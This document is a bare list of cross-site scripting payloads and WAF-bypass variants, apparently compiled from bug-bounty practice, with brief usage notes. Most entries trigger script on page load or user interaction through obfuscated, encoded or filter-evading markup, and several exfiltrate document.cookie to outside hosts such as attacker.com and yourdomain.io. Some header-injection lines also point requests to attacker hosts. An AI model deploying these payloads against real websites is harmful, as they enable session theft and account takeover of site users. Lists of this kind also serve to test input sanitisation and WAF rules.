<img src=123><img src=123><a href="javascript:alert(document.domain)">xss</a><svg></svg><img src=1>
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
<script /***/>/***/confirm(document.cookie,document.domain)/***/</script /***/
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<a href="javascript:void(0)" onmouseover=
javascript:alert(document.domain,document.cookie)
>X</a>
<iframe onload="javascript:prompt(document.domain)" id="hello" role"world">Hello google
‘>alert(154)</script><script/154=’;;;;;;;
10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭>
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
returnuri=%09Jav%09ascript:alert(document.domain)
var onskeywords = 'hello';onload=prompt(0);
'};alert('XSS');var x={y:'
"hello" onmouseover=prompt(0) world=""
test"t"\t/t%3Ct%3Et
ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E]
"♈<<sVg/onload♈=/svg/onload=svg/onmouseOver=confirm'1'><!--♈//="
/><svg src=x onload=confirm(document.domain);>
<script>alert(String.fromCharCode(88, 115, 115, 32, 66, 121, 32, 79, 108, 100, 77, 111, 104, 97, 109, 109))</script>
<svg/onload=alert(document.domain)>")
<<!<script>iframe src=javajavascriptscript:alert(document.domain)>
"><svg onload=alert`XSS`>
foo style=animation-name:gl-spinner-rotate onanimationend=alert(1) -- apply this in profile name section
">svg onx=() onload=(location.href='<BIN>/?mycookies='+document['cookie'])()>
<a"/aonclick=(confirm)()>click
😎<<svg/onload😎=/svg/onload=svg/onmouseOver=confirm'1'><!--😎//="
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null
'-(a=alert,b="_Yooo!_",[b].find(a))-'
%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
<svg%09%0a%0b%0c%0d%0a%00%20onload=alert(1)>
<iframe onload=alert(document.domail)>
<iframe src=%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">
<script%20~~~>\u0061\u006C\u0065\u0072\u0074''</script%20~~~>
<svg onload='new Function'["_Y000!_"].find(al\u0065rt)''>
<sCRipT>alert(1)</sCRiPt>
<script>%0aalert(1)</script>
<scr<script>ipt<alert(1);</scr<script>ipt>
<input onfocus="alert('xss');" autofocus>
<a/href="j	a	v	asc	ri	pi	pt	alert(1)">
<svg•onload=alert(1)>
<script>alert?.(document?.domain)</script>
"<>onauxclick<>=(eval)(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>+<sss
<x/onpointerRawupdate=confirm%26Ipar;1)//x
<script src=//⑮.₨></script>
img{background-image:url('javascript:alert()')}
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
TestPayload</a><a href="javascript:alert(1)">ClickHere</a>
<img src=`xx:xx`onerror=alert(1)>
<div/onmouseover='alert(1)'> style="x:">
\";alert('XSS');//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
"><img class="emoji" alt="😯" src="x" /><svg
">'><details/open/ontoggle=confirm(1337)>
%<script>3cscript%<script>3ealert(1)%<script>3c/script%<script>3e
<input disabled=disabled onbeforecopy=alert(1) value=copyme>
</textarea><img src=x onerror=”var pop=’ALERT(document.cookie);’; eval(pop.toLowerCase());”
</script><script>alert('xElkomy')</script>
OnMoUsEoVeR=prompt(/hacked/)//
<b onmouseover=alert('Wufff!')>click me!</b>
"><script>propmt("mamunwhh")</script>
"><script>alert(document.cookie)</script>
/><svg src=x onload=confirm("1337");>
"><img src=x onerror=confirm(document.domain);>
"mitsec<form/><!><details/open/ontoggle=alert(document.domain)>"@gmail.com
"><body/oNpagEshoW=(confirm)(document.domain)>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
"><details/open/id="&XSS"ontoggle=alert("XSS_WAF_BYPASS_:-)")>
<img/src/onerror=alert(1)>
'"><svg><animate onbegin=alert('hacked') attributeName=x></svg>
<a href=javascript:alert('hacked')>Click Here</a>
<IFRAME SRC="javascript:alert('hacked');"></IFRAME>
<div ng-app> <strong class="ng-init:constructor.constructor('alert('hacked')')()">aaa</strong> </div>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`hacked` //
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
</a<script>alert(document.cookie</script>
"><svg/onload=prompt(1)>
X-Original-URL: https://attacker.com/
X-Original-URL: test//test\
X-Original-URL: https:\\samcurry.net/please//work
True-Client-IP: <h1>XSS</h1></center><script>alert(document.domain)</script>
<img src="X" onerror=top[8680439..toString(30)](1337)>
window&&=(window&&=opener||=alert)?.(1??0,)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
%22%3Cimg%2F**%2Fsrc%3D%22x%22%2F**%2Fonx%3D%22%22%2F**%2Fonerror%3D%22alert%60xss%60%22%3Ef9y60 --encoded
"<img/**/src="x"/**/onx=""/**/onerror="alert`xss`">f9y60 --decoded
OnMoUsEoVeR=prompt(/hacked/)//
<a"/onclick=(confirm)()>Click Here!
%2sscript%2ualert()%2s/script%2u
<svg onload=alert%26%230000000040"1")
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
"autofocus onfocus=alert(1)//
-> Doesn't work
Try this
"type%3d"text"autofocus%20onfocus%3d"alert(1)"
-> Works
xhzeem*/eval?.(value+/()/.source)//"><input value=confirm autofocus onfocus='/*"
Limited case Akamai WAF bypass
<xhzeem/x=" onmouseover=eval?.(id+/(document.domain)/.source) id=confirm>
Works in cases where double quotes are escaped
<xhzeem/x=\" ....>
can also work with single quotes (change it in the payload)
"><img src=x onerror=confirm(document.domain);>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
["');alert('XSS');//"]@xyz.xxx
<Button href="javascript://%0aalert(document.domain)">XSS</Button>
javascript://%0dalert()
javascript:/**/%0aalert()
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
url=%26%2302java%26%23115cript:alert(document.domain)
host+/_ignition/scripts/--%3E%3Csvg%20onload=alert('XSS')%3E
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
"><img src=x onerror=this.src=https://attacker.com/?+document.cookie;>
https://REDACTED/subscribe?source=mllamazares%22%20accesskey=%22X%22%20onclick=%22alert(document.domain)%22/%3EPress%20Alt%2BShift%2BX%20to%20continue%20
<script>new Image().src="http://yourdomain.io/"+document.cookie;</script>